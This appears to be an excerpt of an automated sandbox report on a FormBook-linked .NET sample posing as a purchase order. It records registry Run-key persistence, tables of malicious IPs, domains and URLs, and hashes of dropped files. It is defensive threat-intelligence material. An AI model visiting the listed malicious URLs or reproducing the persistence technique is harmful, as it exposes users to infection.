11:30:46	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif
11:30:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif
11:31:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif
11:31:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif
11:31:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif
11:31:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif
11:31:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif
11:31:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif
11:32:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif.pif
11:32:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif.pif
11:32:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif.pif.pif
11:32:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif.pif.pif.pif

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
63.250.38.167	Purchase List .exe	Get hash	malicious	FormBook	Browse	kothariqhyto.com/1966
34.205.242.146	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	www.bloxequities.com/btrd/?OXxH-=4WIIdRylMiv4qIgDEBGqeNSBdXHIThtTJSMpbK1BRdyqrDdlDKOtwls9OCdMBcFgtBWU&t8l4=FrILp2Q
	FZ6oyLoqGM.exe	Get hash	malicious	Unknown	Browse	fetepe.com/game/account1536/gate/data.php
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	englishbridge.net/index.php
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	englishbridge.net/index.php
	SecuriteInfo.com.Trojan.PackedNET.2627.30890.6585.exe	Get hash	malicious	FormBook	Browse	www.101surgery.com/jk56/?mzud=Hr1xmGD2HjuGCRr4leCYNs0OI7GAffCSLdcBJnJfDDHxahHk1fuC166fJfDLPGeB2s6+Q58bFA==&2dnDM=TR-H0P
	xqz8sQ4mZB.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	keywordranker.com/wp-login.php
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	ranproperty.com/admin
	G7DyaA9iz9.exe	Get hash	malicious	Pushdo	Browse	www.petsfan.com/
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.factrip.com/k13s/?TX=gdiXBZ9XElo0j&NtBd-4=uWrYNxRDxMcfpVUorn5LhOfzlN5kxGxMD93g+bJ9QWy8y87MZqRDKiiGMbTWXlwWiJNY
	OfficeNote.dmg	Get hash	malicious	XLoader	Browse	www.furnishyourhomes.com/09rb/?aL=uJwha8dp_vPTk&8zA8U=9FThH+IwbOwunVlG0mYF7A2xAZ8GMKvvOhPX3O2yxT45oxmu8kJxSYcJ1jFQ61pIwnc=
192.243.59.20	http://storystaffrings.com	Get hash	malicious	Unknown	Browse	storystaffrings.com/
	http://broomvaluable.com	Get hash	malicious	Unknown	Browse	broomvaluable.com/
	http://actressdoleful.com	Get hash	malicious	Unknown	Browse	actressdoleful.com/
	https://nealuria.shop/qomwbgoyummqpbj	Get hash	malicious	Unknown	Browse	highperformancedformats.com/anonymous/
	http://detergenthazardousgranddaughter.com	Get hash	malicious	Unknown	Browse	detergenthazardousgranddaughter.com/
	http://nuvelle.shop:443	Get hash	malicious	Unknown	Browse	highperformancedformats.com/anonymous/
	http://treasonemphasis.com	Get hash	malicious	Unknown	Browse	treasonemphasis.com/
	https://demolishabolish.com/ij6sk7s1?key=55f17a9fee68ea1b6f4ccfa2d96ecf6e	Get hash	malicious	Unknown	Browse	highperformancedformats.com/anonymous/
	http://auxiliaryformalboil.com/aduzw5z5h?key=91907d026bf692230e8a0d17fdb3ea55	Get hash	malicious	Unknown	Browse	auxiliaryformalboil.com/favicon.ico
	http://intuitionguffaw.com	Get hash	malicious	Unknown	Browse	intuitionguffaw.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	http://buddycities.com/	Get hash	malicious	Unknown	Browse	91.195.240.19
	http://buckboosters.com/	Get hash	malicious	Unknown	Browse	91.195.240.19
	http://vpnpanda.org/	Get hash	malicious	Unknown	Browse	91.195.240.19
	presupuesto urgente.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	nBjauMrrmC.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	91.195.240.19
	0001.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
www.emeraldsurrogatefabric.com	Order-1351125X.docx.doc	Get hash	malicious	FormBook	Browse	192.243.61.225
hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	http://free-sex-with-me.pages.dev/	Get hash	malicious	Porn Scam	Browse	54.161.222.85
	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	34.205.242.146
	FZ6oyLoqGM.exe	Get hash	malicious	Unknown	Browse	34.205.242.146
	firmware.armv4l.elf	Get hash	malicious	Unknown	Browse	54.161.222.85
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	54.161.222.85
	firmware.armv7l.elf	Get hash	malicious	Unknown	Browse	54.161.222.85
	firmware.i586.elf	Get hash	malicious	Unknown	Browse	54.161.222.85
	firmware.i686.elf	Get hash	malicious	Unknown	Browse	54.161.222.85
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	54.161.222.85
	firmware.sh4.elf	Get hash	malicious	Unknown	Browse	54.161.222.85

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SEDO-ASDE	http://buddycities.com/	Get hash	malicious	Unknown	Browse	91.195.240.19
	http://buckboosters.com/	Get hash	malicious	Unknown	Browse	91.195.240.19
	http://vpnpanda.org/	Get hash	malicious	Unknown	Browse	91.195.240.19
	presupuesto urgente.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	nBjauMrrmC.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	rAGROTIS10599242024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	oO3ZmCAeLQ.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	file.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	file.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
AMAZON-AESUS	http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21	Get hash	malicious	Unknown	Browse	35.171.206.145
	na.elf	Get hash	malicious	Unknown	Browse	54.173.232.215
	https://we.tl/t-BVtGtb0HLz	Get hash	malicious	Unknown	Browse	52.203.206.228
	na.elf	Get hash	malicious	Unknown	Browse	54.173.232.249
	na.elf	Get hash	malicious	Unknown	Browse	44.223.211.251
	na.elf	Get hash	malicious	Unknown	Browse	3.247.156.111
	na.elf	Get hash	malicious	Unknown	Browse	54.160.208.69
	na.elf	Get hash	malicious	Mirai	Browse	34.207.216.254
	na.elf	Get hash	malicious	Mirai	Browse	34.236.215.184
	na.elf	Get hash	malicious	Mirai	Browse	44.217.112.211
CLOUDFLARENETUS	http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21	Get hash	malicious	Unknown	Browse	104.22.51.98
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://we.tl/t-BVtGtb0HLz	Get hash	malicious	Unknown	Browse	104.17.25.14
	na.elf	Get hash	malicious	Unknown	Browse	104.28.142.242
	Message_2551600.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	na.elf	Get hash	malicious	Unknown	Browse	104.16.244.186
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Oilmax Systems Updated.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Oilmax Systems Updated.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
ADVANCEDHOSTERS-ASNL	http://pancakeswaplogin.educatorpages.com/	Get hash	malicious	Unknown	Browse	31.220.27.134
	https://www.cpmrevenuegate.com/n6zwydwb?key=61b0420b9b99c2ec074ef98b4030ef8c	Get hash	malicious	Anonymous Proxy	Browse	192.243.59.13
	https://www.wbtd.com/	Get hash	malicious	Unknown	Browse	185.98.54.153
	https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_ios	Get hash	malicious	Unknown	Browse	31.220.27.154
	https://www.marketbeat.com/articles/music-streaming-site-spotify-temporarily-goes-down-2024-09-29/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletterclick&source=ARNDaily&AccountID=13091940&hash=99E2922EEB6FEC86743F5DB2C0E84BA5899D68F68F1472F885291F590EAD713452D3376C362A15DEDE29DFC4761637FD6FDD698F31176C60366847F610D6C32C	Get hash	malicious	Unknown	Browse	31.220.27.134
	https://kaisonfhtr.pages.dev/	Get hash	malicious	Anonymous Proxy	Browse	192.243.59.20
	http://www.goo.su/c1Rnox/	Get hash	malicious	Unknown	Browse	31.220.27.134
	http://klvegaold.com/clicks/MjM4ODJfMjgzMjU2XzIzLjAwMDg3XzEzXzE3MjczMjI5MTc3OTgzMDE4MTcyXzIwXjE5ZTIzY2UwYzk5N2JlZjAyYzhiMzU2OWFhMmUyMDhkXjA2LjkuMjYuMjAyNA==	Get hash	malicious	Unknown	Browse	185.177.94.117
	https://klvegaold.com/clicks/MjM4ODJfMjgzMjU2XzIzLjAwMDg3XzEzXzE3MjczMjgwNzU5NDEwMDQ5MTcyXzIwXjkwMGMwZGQ5NzJkYzQ2OTYzZTUyM2Y4ZDA1YzJjOGM4XjA4LjkuMjYuMjAyNA==	Get hash	malicious	Unknown	Browse	185.177.94.117
	http://klvegaold.com/clicks/MjM4ODJfMjgzMjU2XzIzLjAwMDg3XzEzXzE3MjczMjYzMjAzMTkwNTY2MTcyXzIwXmQ0MTI1ZDE3OGIxODI5MjQ3MmVhMTEzMDJkNzQ4NjA2XjA3LjkuMjYuMjAyNA==	Get hash	malicious	Unknown	Browse	185.177.94.117
NAMECHEAP-NETUS	na.elf	Get hash	malicious	Mirai	Browse	162.255.117.53
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	198.54.114.247
	Products Order Catalogs20242.exe	Get hash	malicious	FormBook	Browse	68.65.122.222
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	162.213.249.216
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	162.0.238.238
	Arrival notice.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	http://buddycities.com/	Get hash	malicious	Unknown	Browse	162.255.119.35
	http://buckboosters.com/	Get hash	malicious	Unknown	Browse	192.64.119.229
	http://vpnpanda.org/	Get hash	malicious	Unknown	Browse	162.255.119.66
	172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe	Get hash	malicious	SmokeLoader	Browse	198.54.117.242

Process:	C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.337581307589483
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxLHqHxvpHA:Pq5qHwCYqh3oPtI6eqzxRLKRhg
MD5:	E8F202D47F8209A1C5C4BDEB370E4BBC
SHA1:	02D322F9852FA4E53BE3996868275A55F1228078
SHA-256:	71719EF4FD3912492F7AD3CA6CF8F5A458C0EC56CEECDE1005B05B610B5FF378
SHA-512:	73D9B1C6EF04422CFEC911A1E58D376724E4F47AFD49F0D54F711895DE8EC9CE0EF046AEE98BE284B23540A2005C5E716F315B909F693B2C01D8BAC7BBD60B6C
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.log

Download File

Process:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.337581307589483
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxLHqHxvpHA:Pq5qHwCYqh3oPtI6eqzxRLKRhg
MD5:	E8F202D47F8209A1C5C4BDEB370E4BBC
SHA1:	02D322F9852FA4E53BE3996868275A55F1228078
SHA-256:	71719EF4FD3912492F7AD3CA6CF8F5A458C0EC56CEECDE1005B05B610B5FF378
SHA-512:	73D9B1C6EF04422CFEC911A1E58D376724E4F47AFD49F0D54F711895DE8EC9CE0EF046AEE98BE284B23540A2005C5E716F315B909F693B2C01D8BAC7BBD60B6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.pif.log

Download File

Process:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.337581307589483
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxLHqHxvpHA:Pq5qHwCYqh3oPtI6eqzxRLKRhg
MD5:	E8F202D47F8209A1C5C4BDEB370E4BBC
SHA1:	02D322F9852FA4E53BE3996868275A55F1228078
SHA-256:	71719EF4FD3912492F7AD3CA6CF8F5A458C0EC56CEECDE1005B05B610B5FF378
SHA-512:	73D9B1C6EF04422CFEC911A1E58D376724E4F47AFD49F0D54F711895DE8EC9CE0EF046AEE98BE284B23540A2005C5E716F315B909F693B2C01D8BAC7BBD60B6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.pif.pif.log

Download File

Process:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.337581307589483
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxLHqHxvpHA:Pq5qHwCYqh3oPtI6eqzxRLKRhg
MD5:	E8F202D47F8209A1C5C4BDEB370E4BBC
SHA1:	02D322F9852FA4E53BE3996868275A55F1228078
SHA-256:	71719EF4FD3912492F7AD3CA6CF8F5A458C0EC56CEECDE1005B05B610B5FF378
SHA-512:	73D9B1C6EF04422CFEC911A1E58D376724E4F47AFD49F0D54F711895DE8EC9CE0EF046AEE98BE284B23540A2005C5E716F315B909F693B2C01D8BAC7BBD60B6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.log

Download File

Process:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.337581307589483
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxLHqHxvpHA:Pq5qHwCYqh3oPtI6eqzxRLKRhg
MD5:	E8F202D47F8209A1C5C4BDEB370E4BBC
SHA1:	02D322F9852FA4E53BE3996868275A55F1228078
SHA-256:	71719EF4FD3912492F7AD3CA6CF8F5A458C0EC56CEECDE1005B05B610B5FF378
SHA-512:	73D9B1C6EF04422CFEC911A1E58D376724E4F47AFD49F0D54F711895DE8EC9CE0EF046AEE98BE284B23540A2005C5E716F315B909F693B2C01D8BAC7BBD60B6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.8694181258959155
Encrypted:	false
SSDEEP:	384:zZizC2pKXg9eH58VkRS/oFGPikzhlZBBmBi1S0f9EKR4VWjs5anwNmJ8sxSvpphB:z/wJevBzM6RB
MD5:	30ECD7046839AF0716977A9EF6047E60
SHA1:	A1F6517726C9DC0F3D588B947E2AAEB4F849F58C
SHA-256:	472A703381C8FE89F83B0FE4D7960B0942C5694054BA94DD85C249C4C702E0CD
SHA-512:	7DAD8EC1C5040112DEEE48EF6DBD56E7AAC3DB65DEE11568F5E9FEA96B33B2B6030F560C834BA51DCB0CB98EB837C2638E7F9C8B39C1F46395BD8259C88F8937
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.f..............0..D...........b... ........@.. ....................................`..................................b..O...................................La............................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............^..............@..B.................b......H.......,>.. #...........................................................0..0.........}.....(......(......r...po....&.(......(.........0..Y.........{....o....r...p(....,..{....o....r...p(....+....,..s......o......+...{....r...po..........0...........s......o.......0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.... .....?s....o......{........s....o......{....rY..po..

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.8694181258959155
Encrypted:	false
SSDEEP:	384:zZizC2pKXg9eH58VkRS/oFGPikzhlZBBmBi1S0f9EKR4VWjs5anwNmJ8sxSvpphB:z/wJevBzM6RB
MD5:	30ECD7046839AF0716977A9EF6047E60
SHA1:	A1F6517726C9DC0F3D588B947E2AAEB4F849F58C
SHA-256:	472A703381C8FE89F83B0FE4D7960B0942C5694054BA94DD85C249C4C702E0CD
SHA-512:	7DAD8EC1C5040112DEEE48EF6DBD56E7AAC3DB65DEE11568F5E9FEA96B33B2B6030F560C834BA51DCB0CB98EB837C2638E7F9C8B39C1F46395BD8259C88F8937
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.f..............0..D...........b... ........@.. ....................................`..................................b..O...................................La............................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............^..............@..B.................b......H.......,>.. #...........................................................0..0.........}.....(......(......r...po....&.(......(.........0..Y.........{....o....r...p(....,..{....o....r...p(....+....,..s......o......+...{....r...po..........0...........s......o.......0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.... .....?s....o......{........s....o......{....rY..po..

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.8694181258959155
Encrypted:	false
SSDEEP:	384:zZizC2pKXg9eH58VkRS/oFGPikzhlZBBmBi1S0f9EKR4VWjs5anwNmJ8sxSvpphB:z/wJevBzM6RB
MD5:	30ECD7046839AF0716977A9EF6047E60
SHA1:	A1F6517726C9DC0F3D588B947E2AAEB4F849F58C
SHA-256:	472A703381C8FE89F83B0FE4D7960B0942C5694054BA94DD85C249C4C702E0CD
SHA-512:	7DAD8EC1C5040112DEEE48EF6DBD56E7AAC3DB65DEE11568F5E9FEA96B33B2B6030F560C834BA51DCB0CB98EB837C2638E7F9C8B39C1F46395BD8259C88F8937
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.f..............0..D...........b... ........@.. ....................................`..................................b..O...................................La............................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............^..............@..B.................b......H.......,>.. #...........................................................0..0.........}.....(......(......r...po....&.(......(.........0..Y.........{....o....r...p(....,..{....o....r...p(....+....,..s......o......+...{....r...po..........0...........s......o.......0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.... .....?s....o......{........s....o......{....rY..po..

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.8694181258959155
Encrypted:	false
SSDEEP:	384:zZizC2pKXg9eH58VkRS/oFGPikzhlZBBmBi1S0f9EKR4VWjs5anwNmJ8sxSvpphB:z/wJevBzM6RB
MD5:	30ECD7046839AF0716977A9EF6047E60
SHA1:	A1F6517726C9DC0F3D588B947E2AAEB4F849F58C
SHA-256:	472A703381C8FE89F83B0FE4D7960B0942C5694054BA94DD85C249C4C702E0CD
